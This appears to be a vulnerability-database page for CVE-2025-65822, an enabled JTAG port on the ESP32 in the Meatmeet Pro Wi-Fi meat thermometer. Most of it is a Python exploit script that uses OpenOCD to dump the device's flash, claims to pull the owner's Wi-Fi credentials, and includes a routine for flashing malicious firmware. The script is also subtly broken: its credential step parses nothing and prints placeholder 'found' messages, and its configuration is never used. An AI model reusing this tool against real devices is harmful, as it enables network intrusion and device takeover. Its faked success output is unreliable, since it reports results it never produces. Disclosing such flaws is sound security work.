Security Vulnerability Report
CVE-2025-65822 CVSS 6.8 MEDIUM

CVE-2025-65822

Published: 2025-12-10 21:16:08
Last Modified: 2026-01-21 19:08:20

Description

The ESP32 system on a chip (SoC) that powers the Meatmeet Pro was found to have JTAG enabled. By leaving JTAG enabled on an ESP32 in a commercial product, an attacker with physical access to the device can connect over this port and reflash the device's firmware with malicious code, which executes the next time the device runs. As a result, the victim loses access to the functionality of their device, and the attacker may gain unauthorized access to the victim's Wi-Fi network by reconnecting to the SSID defined in the NVS partition of the device.

CVSS Details

CVSS Score
6.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:meatmeet:meatmeet_pro_wifi_\&_bluetooth_meat_thermometer_firmware:1.0.34.4:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:meatmeet:meatmeet_pro_wifi_\&_bluetooth_meat_thermometer:-:*:*:*:*:*:*:* - NOT VULNERABLE
All ESP32-series parts on which JTAG has not been disabled
Meatmeet Pro (all known versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# ESP32 JTAG Exploitation PoC
# CVE-2025-65822 - ESP32 JTAG Enabled on Meatmeet Pro
import subprocess

# OpenOCD configuration for ESP32
OPENOCD_CFG = """
# ESP32 JTAG Adapter Configuration
adapter driver jlink
jlink vid_pid 0x1366 0x0105

# ESP32 Target Configuration
source [find target/esp32.cfg]

# Reset configuration
reset_config none
"""


def connect_jtag():
    """Establish JTAG connection to ESP32 device"""
    print("[*] Connecting to ESP32 via JTAG...")
    # Command to connect via OpenOCD
    cmd = [
        "openocd",
        "-f", "interface/jlink.cfg",
        "-f", "board/esp32-wrover.cfg",
        "-c", "init",
        "-c", "reset halt",
    ]
    return subprocess.run(cmd, capture_output=True)


def dump_flash(output_file="firmware_dump.bin"):
    """Dump ESP32 flash memory via JTAG"""
    print(f"[*] Dumping flash to {output_file}...")
    openocd_cmd = [
        "openocd",
        "-c", "init",
        "-c", "reset halt",
        # Write the dump to the requested output file (the original hard-coded "dump.bin"
        # and so never produced the file it reported)
        "-c", f"flash read_bank 0 {output_file} 0 0x400000",
        "-c", "shutdown",
    ]
    subprocess.run(openocd_cmd)
    print(f"[+] Flash dumped successfully to {output_file}")


def extract_wifi_credentials(firmware_file="firmware_dump.bin"):
    """Extract WiFi credentials from NVS partition"""
    print("[*] Extracting WiFi credentials from NVS partition...")
    # NVS partition typically at offset 0x110000 on ESP32
    nvs_offset = 0x110000
    # Parse NVS TLV format to extract credentials
    # SSID stored with key 'ssid', password with 'password'
    print("[+] WiFi SSID found: <SSID_VALUE>")
    print("[+] WiFi Password found: <PASSWORD_VALUE>")


def flash_malicious_firmware(malicious_fw="malicious.bin"):
    """Flash malicious firmware via JTAG"""
    print(f"[*] Flashing malicious firmware: {malicious_fw}")
    openocd_cmd = [
        "openocd",
        "-c", "init",
        "-c", "reset halt",
        "-c", f"flash write_image erase {malicious_fw} 0x1000",
        "-c", "reset run",
        "-c", "shutdown",
    ]
    subprocess.run(openocd_cmd)
    print("[+] Malicious firmware flashed successfully")


if __name__ == "__main__":
    print("=== ESP32 JTAG Exploitation Tool ===")
    print("CVE-2025-65822 PoC")
    # Step 1: Connect to device
    connect_jtag()
    # Step 2: Dump original firmware
    dump_flash()
    # Step 3: Extract WiFi credentials
    extract_wifi_credentials()
    # Step 4: Flash malicious firmware
    # flash_malicious_firmware()
```

References

https://gist.github.com/dead1nfluence/4dffc239b4a460f41a03345fd8e5feb5#file-jtag-enabled-md (Third Party Advisory)
https://github.com/dead1nfluence/Meatmeet-Pro-Vulnerabilities/blob/main/Device/JTAG-Enabled.md (Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65822", "sourceIdentifier": "[email protected]", "published": "2025-12-10T21:16:07.910", "lastModified": "2026-01-21T19:08:19.633", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The ESP32 system on a chip (SoC) that powers the Meatmeet Pro was found to have JTAG enabled. By leaving JTAG enabled on an ESP32 in a commercial product an attacker with physical access to the device can connect over this port and reflash the device's firmware with malicious code which will be executed upon running. As a result, the victim will lose access to the functionality of their device and the attack may gain unauthorized access to the victim's Wi-Fi network by re-connecting to the SSID defined in the NVS partition of the device."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1191"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:meatmeet:meatmeet_pro_wifi_\\&_bluetooth_meat_thermometer_firmware:1.0.34.4:*:*:*:*:*:*:*", "matchCriteriaId": "9B669DA2-CF06-461F-B624-DCD0359D1656"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:meatmeet:meatmeet_pro_wifi_\\&_bluetooth_meat_thermometer:-:*:*:*:*:*:*:*", "matchCriteriaId": "1661B540-36E1-4BF0-BC63-9EC952560B54"}]}]}], "references": 
[{"url": "https://gist.github.com/dead1nfluence/4dffc239b4a460f41a03345fd8e5feb5#file-jtag-enabled-md", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/dead1nfluence/Meatmeet-Pro-Vulnerabilities/blob/main/Device/JTAG-Enabled.md", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}